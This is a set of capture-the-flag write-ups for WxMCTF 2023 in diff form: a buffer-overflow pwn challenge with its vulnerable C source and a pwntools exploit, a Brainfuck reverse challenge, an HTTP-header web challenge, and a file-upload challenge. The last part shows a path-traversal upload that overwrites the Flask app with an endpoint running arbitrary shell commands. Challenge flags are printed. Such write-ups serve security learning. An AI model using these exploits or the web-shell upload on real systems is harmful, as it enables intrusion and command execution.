+We have been given a source code (You can download the file [here](cats_mAxjvpN.c)) and an instance. Here is the content of the source code
+```c
+#include <stdio.h>
+#include <stdlib.h>
+
+void cats() {
+    char hmm[40];
+
+    puts("Do you like cats?");
+    int trustNoOne = 0;
+    gets(hmm);
+
+    if(trustNoOne == 0xdeadbeef) {
+        puts("hmmm... alright, here's my secret:\n");
+        const char* flag = getenv("FLAG");
+        if (flag == NULL) {
+            printf("Flag not found!\n");
+            exit(0);
+        }
+    printf("%s\n",flag);
+    } else {
+        puts(">:( you're not allowed to see my secret!");
+    }
+}
+
+int main() {
+    setvbuf(stdout, NULL, 2, 0);
+    cats();
+}
+```
+
+We need to change the value of the `trustNoOne` variable from `0` to `0xdeadbeef` to get the flag
+
+## How to Solve?
+To get the flag we need to exploit using buffer overflow to overwrite the `trustNoOne` variable
+
+```python
+#!/usr/bin/env python3
+from pwn import *
+p = remote('b03c9f7.678470.xyz', 32756)
+payload = b'A' * 60 + p32(0xdeadbeef)
+p.sendlineafter(b'Do you like cats?\n', payload)
+p.interactive()
+```
+
+The script constructs a payload consisting of 60 bytes of the ASCII character `A` followed by a little-endian representation of the hexadecimal value `0xdeadbeef`. Run the instance and then run the program, and you will get the flag
+
+![flag](images/flag.png)
+
+```
+wxmctf{c@t$_@R3_th3_B3$t}
+```

WxMCTF 2023/WxMCTF Pwn 1 - Cats/cats_mAxjvpN.c

@@ -0,0 +1,27 @@
+#include <stdio.h>
+#include <stdlib.h>
+
+void cats() {
+ char hmm[40];
+
+ puts("Do you like cats?");
+ int trustNoOne = 0;
+ gets(hmm);
+
+ if(trustNoOne == 0xdeadbeef) {
+  puts("hmmm... alright, here's my secret:\n");
+  const char* flag = getenv("FLAG");
+  if (flag == NULL) {
+   printf("Flag not found!\n");
+   exit(0);
+  }
+  printf("%s\n",flag);
+ } else {
+  puts(">:( you're not allowed to see my secret!");
+ }
+}
+
+int main() {
+ setvbuf(stdout, NULL, 2, 0);
+ cats();
+}

WxMCTF 2023/WxMCTF Rev 3 - Brainf/README.md

@@ -0,0 +1,14 @@
+# WxMCTF Rev 3 - Brainf
+> My brain hurts after creating this challenge... but not as much as it would if I was a student at MGCI
+
+## About the Challenge
+We have been given 2 files (An [interpreter](interpreter.py) and [brainfuck](program.bf) file)
+
+## How to Solve?
+To get the flag you can use the brainfuck interpreter online for example [dcode.fr](https://www.dcode.fr/brainfuck-language)
+
+![flag](images/flag.png)
+
+```
+wxmctf{br4inf_1s_Tur1ng_c0mpl3te_3pPzYq}
+```

WxMCTF 2023/WxMCTF Rev 3 - Brainf/interpreter.py

@@ -0,0 +1,44 @@
+import sys
+
+TAPE_SIZE = 500
+
+def run(code):
+    stack = []
+    lmatch = dict()
+    rmatch = dict()
+    for i in range(len(code)):
+        if code[i] == '[':
+            stack.append(i)
+        elif code[i] == ']':
+            lmatch[i] = stack[-1]
+            rmatch[stack[-1]] = i
+            stack.pop()
+    tape = [0] * TAPE_SIZE
+    iptr = 0 # instruction
+    mptr = 0 # memory
+    while iptr < len(code):
+        instr = code[iptr]
+        if instr == '>':
+            mptr += 1
+        elif instr == '<':
+            mptr -= 1
+        elif instr == '+':
+            tape[mptr] += 1
+            tape[mptr] %= 256
+        elif instr == '-':
+            tape[mptr] -= 1
+            tape[mptr] %= 256
+        elif instr == '.':
+            print(chr(tape[mptr]), end='', flush=True)
+        elif instr == ',':
+            tape[mptr] = ord(sys.stdin.read(1)) % 256
+        elif instr == '[':
+            if tape[mptr] == 0:
+                iptr = rmatch[iptr]
+        elif instr == ']':
+            if tape[mptr] != 0:
+                iptr = lmatch[iptr]
+        iptr += 1
+
+if __name__ == '__main__':
+    run(open(sys.argv[1]).read())

WxMCTF 2023/WxMCTF Rev 3 - Brainf/program.bf

@@ -0,0 +1 @@
+>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>[-]>[-]<>+++++++[<++++++++++>-]<-.>+++++[<++++++++>-]<+.++++++.---------------.+++++++++++++.>+++++++++[<--------->-]<-.>++++++[<++++++++>-]<.>++++[<++++>-]<+.>+++[<++++++>-]<..++++.--------.+++.--------------.>++++++[<------->-]<.>+++++[<----->-]<-.<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<[-]>[-]++++++++++[<++++++++++++>-]<->[-]>[-]++++++++++[<++++++++++++>-]<>[-]>[-]+++++++++[<++++++++++++>-]<+>[-]>[-]+++++++++[<+++++++++++>-]<>[-]>[-]+++++++++[<+++++++++++++>-]<->[-]>[-]++++++++++[<++++++++++>-]<++>[-]>[-]+++++++++++[<+++++++++++>-]<++>[-]>[-]+++++++[<++++++++++++++>-]<>[-]>[-]++++++++[<++++++++++++++>-]<++>[-]>[-]++++[<+++++++++++++>-]<>[-]>[-]+++++++[<+++++++++++++++>-]<>[-]>[-]++++++++++[<+++++++++++>-]<>[-]>[-]++++++++++[<++++++++++>-]<++>[-]>[-]++++++++[<++++++++++++>-]<->[-]>[-]+++++++[<+++++++>-]<>[-]>[-]+++++++++[<+++++++++++++>-]<-->[-]>[-]++++++++[<++++++++++++>-]<->[-]>[-]+++++++[<++++++++++++>-]<>[-]>[-]+++++++++[<+++++++++++++>-]<>[-]>[-]++++++++[<++++++++++++++>-]<++>[-]>[-]+++++++[<+++++++>-]<>[-]>[-]++++++++++[<+++++++++++>-]<>[-]>[-]++++++++[<+++++++++++++>-]<->[-]>[-]++++++++[<++++++++++++>-]<->[-]>[-]+++++++++[<+++++++++++>-]<>[-]>[-]++++++[<++++++++>-]<>[-]>[-]+++++++++[<++++++++++++>-]<+>[-]>[-]++++++++[<++++++++++++++>-]<>[-]>[-]+++++++++[<++++++++++++>-]<>[-]>[-]+++++[<++++++++++>-]<+>[-]>[-]+++++++++[<+++++++++++++>-]<->[-]>[-]++++++++++[<++++++++++>-]<+>[-]>[-]++++++++[<++++++++++++>-]<->[-]>[-]+++++[<++++++++++>-]<+>[-]>[-]++++++++[<++++++++++++++>-]<>[-]>[-]++++++++[<++++++++++>-]<>[-]>[-]+++++++++++[<+++++++++++>-]<+>[-]>[-]++++++++[<+++++++++++>-]<+>[-]>[-]++++++++[<++++++++++++++>-]<+>[-]>[-]+++++++++[<++++++++++++++>-]<->>>><[-]+><>[-]<<<[-]>>[>+<<<+>>-]>[<+>-]<><[-]+><>[-]<<[-]>[>+<<+>-]>[<+>-]<><>[-]><>[-]<<[-]>[>+<<+>-]>[<+>-]<><[-]>[-]<<[>+>+<<-]>>[<<+>>-][-]>[-]+++++[<++++++++>-]<><<>>[-]>[-]<<[>[-]<<[>>+>+<<<-]>>[<<+>>-]+>[[-]<-<<->>>]<<-]<[-]>>[<<+>>-]<<[<>[-]>[-]<<<[>>+>+<<<-]>>>[<<<+>>>-]<[>>>[-]><,><>[-]<<[-]>[>+<<+>-]>[<+>-]<><[-]>[-]<<[>+>+<<-]>>[<<+>>-][-]>[-]<<<<<<[>>>>>+>+<<<<<<-]>>>>>>[<<<<<<+>>>>>>-][-]<[>>[-]+<[>+<-]<-[>+<-]>]>>[-]>[-]<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>+>+<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<-]>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<+>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>-]<[<<+>>-]<[<[<+>-]>-[<+>-]<]<<[->-<]>[<+>[-]]<[>>[-]><>[-]<<<<<<<<<[-]>>>>>>>>[>+<<<<<<<<<+>>>>>>>>-]>[<+>-]<><<<[-]][-]>[-]<<[>+>+<<-]>>[<<+>>-][-]++++++++++><<[->-<]+>[<->[-]]<[>>[-]><>[-]<<<<<<<<[-]>>>>>>>[>+<<<<<<<<+>>>>>>>-]>[<+>-]<><<<[-]]<<<[-]]<>[-]>[-]<<[>+>+<<-]>>+[<<+>>-]<[-]>[-]<<[>+>+<<-]>>[<<+>>-][-]>[-]+++++[<++++++++>-]<><<>>[-]>[-]<<[>[-]<<[>>+>+<<<-]>>[<<+>>-]+>[[-]<-<<->>>]<<-]<[-]>>[<<+>>-]<<]<[-]>[-]<<<[>>+>+<<<-]>>>[<<<+>>>-][-]+<[>->[-]>[-]<>++++++[<+++++++++++>-]<+.>++++[<+++++++++++>-]<.-.-------.+++++++++++.>++++[<---->-]<-.>+++[<++++++>-]<+.+.---------.-----------.>+++[<++++++>-]<+.-----------.++++++.-.+++++.>+++++++[<---------->-]<-.------------.>+++++++[<++++++++++++>-]<.------------.-------.>+++[<++++++>-]<+.>+++++++[<------------>-]<.>++++++++[<+++++++++>-]<+.++++++++++.>+++++++[<------------>-]<+.>+++++++[<++++++++++++>-]<.------------.---.>+++++++[<---------->-]<+.>++++++[<+++++++++++>-]<+.++++++++++++.+++..-------------.--.>++++[<++++>-]<+.>+++++++[<------------>-]<.>++++++++[<++++++++++>-]<.---------------.>+++[<++++++>-]<..++++.--------.+++.--------------.>++++++[<----------->-]<-.>++++[<------>-]<+.<<[-]]>[>[-]>[-]<>+++++++[<++++++++++++>-]<-.>++++[<+++++++>-]<.+++..+++++++.>+++++++[<----------->-]<.------------.>++++++++[<+++++++++++>-]<-.-----.---.-.-------.>+++++++[<---------->-]<-.>++++++++[<++++++++++>-]<.---------------.>+++[<++++++>-]<..++++.--------.+++.--------------.>++++++[<----------->-]<-.>++++[<------>-]<+.<-]<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

WxMCTF 2023/WxMCTF Web 2 - Restricted Access/README.md

@@ -0,0 +1,34 @@
+# WxMCTF Web 2 - Restricted Access
+> Legend has it that WLMAC has a super duper secret website, currently being used to plot attacks against MGCI...
+
+> Access the challenge right here: https://weba.jonathanw.dev:3002/
+
+## About the Challenge
+We have been given a website and we need to change some headers to get the flag
+
+![preview](images/preview.png)
+
+## How to Solve?
+First, you need to change the `User-Agent` header to `lyonbrowser`
+
+![first](images/first.png)
+
+And then you need to add a header called `Referer` and the value is `https://maclyonsden.com/`
+
+![second](images/second.png)
+
+And then you need to add a header called `Date` and the value is `2043`
+
+![third](images/third.png)
+
+Add another header called `Upgrade-Insecure-Requests` and the value is `1`
+
+![fourth](images/fourth.png)
+
+And the last one you need a header called `Downtime` and set the value into a big number for example 99999999999
+
+![last](images/last.png)
+
+```
+wxmctf{s3cret_sit3_http_head3rs_r_c0o1}
+```

WxMCTF 2023/WxMCTF Web 3 - NFTs/README.md

@@ -0,0 +1,116 @@
+# WxMCTF Web 3 - NFTs
+> Seize the means of minting!
+
+## About the Challenge
+We have been given a web source code (You can download the source code [here](dist.zip)) and we can start an instance too. Here is the preview of the website
+
+## How to Solve?
+There are 2 functionality on the website, we can upload some file to the website and then we can access the file in `nfts` endpoint. Pretty simple right? If we check the `launch.sh` file
+```sh
+#!/bin/sh
+gunicorn -w 1 -b 0.0.0.0:5000 --reload app:app
+python -m http.server 5000
+```
+
+The gunicorn will restart if there is a code change in the source code. And because there is no restriction at all on the upload feature
+
+```python
+from flask import Flask, request, render_template, redirect, flash, make_response
+from flask import send_from_directory
+import os
+
+app = Flask(__name__)
+app.secret_key = os.urandom(16)
+
+@app.route("/", methods=['GET', 'POST'])
+def index():
+    if request.method == 'POST':
+        if 'file' not in request.files:
+            flash('No file part')
+            return redirect(request.url)
+        file = request.files['file']
+        if file.filename == '':
+            flash('No selected file')
+            return redirect(request.url)
+        if file:
+            file.save(os.path.join("./nfts/", file.filename))
+            return redirect(request.url)
+
+    return render_template('index.html')
+
+@app.route('/nfts')
+def browse_nfts():
+    nfts = os.listdir("nfts")
+    return render_template('nfts.html', nfts=nfts)
+
+@app.route('/nft/<name>')
+def send_nft(name):
+    return send_from_directory("nfts", name, mimetype="application/octet-stream", as_attachment=True)
+```
+
+The idea here is you need to update the source code called `app.py` and add a malicious code. If you can see the HTTP request below, i added an endpoint called `test` to run an OS command
+
+```
+POST / HTTP/1.1
+Host: 59db0cc.678470.xyz
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------263566758113396374204204538370
+Content-Length: 1456
+Origin: http://59db0cc.678470.xyz
+Connection: close
+Referer: http://59db0cc.678470.xyz/
+Upgrade-Insecure-Requests: 1
+
+-----------------------------263566758113396374204204538370
+Content-Disposition: form-data; name="file"; filename="../app.py"
+Content-Type: application/octet-stream
+
+from flask import Flask, request, render_template, redirect, flash, make_response
+from flask import send_from_directory
+import subprocess,os
+
+app = Flask(__name__)
+app.secret_key = os.urandom(16)
+
+@app.route("/", methods=['GET', 'POST'])
+def index():
+    if request.method == 'POST':
+        if 'file' not in request.files:
+            flash('No file part')
+            return redirect(request.url)
+        file = request.files['file']
+        if file.filename == '':
+            flash('No selected file')
+            return redirect(request.url)
+        if file:
+            file.save(os.path.join("./nfts/", file.filename))
+            return redirect(request.url)
+
+    return render_template('index.html')
+
+@app.route('/nfts')
+def browse_nfts():
+    nfts = os.listdir("nfts")
+    return render_template('nfts.html', nfts=nfts)
+
+@app.route('/nft/<name>')
+def send_nft(name):
+    return send_from_directory("nfts", name, mimetype="application/octet-stream", as_attachment=True)
+
+def run_command(command):
+    return subprocess.Popen(command, shell=True, stdout=subprocess.PIPE).stdout.read()
+
+@app.route('/test/<command>')
+def command_server(command):
+    return run_command(command)
+-----------------------------263566758113396374204204538370--
+```
+
+After sending the request, I wait 1 sec and then I access `http://example/test/env` to get the flag because the flag is located on the environtment
+
+```
+Because the instance was dead, there is no flag here
+```